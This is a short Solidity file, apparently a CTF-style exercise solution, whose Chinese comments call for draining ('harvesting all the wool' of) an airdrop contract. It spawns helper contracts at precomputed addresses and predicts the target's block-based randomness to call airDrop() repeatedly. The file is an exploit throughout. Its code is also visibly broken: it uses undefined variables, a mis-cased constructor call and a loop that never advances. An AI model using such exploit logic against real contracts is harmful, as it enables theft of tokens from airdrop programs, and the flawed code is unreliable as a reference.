airdrop_hack

airdrop_hack.sol

// 实现 Hacker 合约并薅走全部的羊毛。
// 注意 gas 控制。

contract Attack{
    function Attack(address _game, uint count) public {
        Airdrop a = Airdrop(b);
        for (uint i=0; i< count; i++) {
                a.airDrop();
    
        }
    }
}

contract Hacker {
    
    function hack(address _game, uint count) public{
        Attack a = new Attack(_game, count);
    }
}


contract AirdropPwn {
    using SafeMath for *;
    mapping(address => uint) public contract_nonce;
    mapping(uint => address) public contracts;
    uint public  nums = 1;
  
    function newContract() public{
        while (n < 20){
            address _newHacker = address(keccak256(abi.encodePacked(0xd6, 0x94, address(this), byte(n))));
            contract_nonce[_newHacker] = 1;
            contracts[n] = _newHacker;
            nums = nums + 1;
            // address(hacker) 是等于 _newHacker 的
            Hacker hacker = new hacker();
      
        }
    }
    
    
    function doIt(address _game, uint count) public  returns(bool){
     
        for (uint256 i = 1;i<nums ;i++) {
    
		address _address = contracts[i];
		uint256 _nonce = contract_nonce[_address];
		address sender = address(keccak256(abi.encodePacked(0xd6, 0x94, _address, byte(_nonce))));

		uint256 seed = uint256(keccak256(abi.encodePacked(
		    (block.timestamp).add
		    (block.difficulty).add
		    ((uint256(keccak256(abi.encodePacked(block.coinbase)))) / (now)).add
		    (block.gaslimit).add
		    ((uint256(keccak256(abi.encodePacked(address(sender))))) / (now)).add
		    (block.number)
		)));
		 if((seed - ((seed / 1000) * 1000)) < 300){
		    Hacker hack = Hacker(_address);
		    hack.hack(_game, count);
		    return true;
		 }
    	}
    	return false;        
	}
}